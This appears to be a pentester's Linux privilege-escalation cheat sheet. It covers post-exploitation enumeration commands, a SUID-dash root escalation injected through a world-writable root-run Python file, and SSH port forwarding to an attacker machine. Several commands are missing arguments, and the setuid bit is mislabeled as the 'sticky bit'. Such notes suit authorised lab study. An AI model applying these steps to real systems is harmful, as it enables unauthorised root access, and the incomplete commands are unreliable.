Linux Priv Esc

Tools and commands for an initial post exploitation recon

Useful Priv esc enumeration scripts


For see the procs running:

Check the version of installed software

dpkg -s <program name>

A way to enumerate users, groups, files, and permissions

find /home -printf "%f\t%p\t%u\t%g\t%m\n" 2>/dev/null |column -t

.bash_logout /home/george/.bash_logout george george 644

.bashrc /home/george/.bashrc george george 644 /home/george/ george george 644 /home/george/.cache/ george george 644

.sudo_as_admin_successful /home/george/.sudo_as_admin_successful george george 644

user.txt /home/george/user.txt george george 644

.nano_history /home/george/.nano_history root root 600

.mysql_history /home/george/.mysql_history root root 600

.bash_history /home/george/.bash_history root root 600

.profile /home/george/.profile george george 644

Look for a specific package installed a system

dpkg -l |grep -i <package>

Look for set UID files

find / -perm -4000 2>/dev/null

World writable python file ran as root (SUID) - dash priv esc

os.system('chmod 4755 /bin/dash')

  • with the sticky bit set on /bin/dash, type dash

  • running the id will show that our euid (effective uid) is now root

  • we are now able to run commands as root

Find which ports a server is listening on

netstat -an |grep LIST

Check if ASLR is enabled

cat /proc/sys/kernel/randomize_va_space 0

  • 0 -> means that ASLR is disabled. 1 -> means that it is enabled

Check for Locally running services and port forward them to our machine

netstat -natp |grep

  • run this on the target linux box

Port forwarding local ports to attacker machine

ssh -L 52846: jimmy@

  • run this command from your attacker machine

  • then check the local port in your web browser on your attacker machine

    • e.g.

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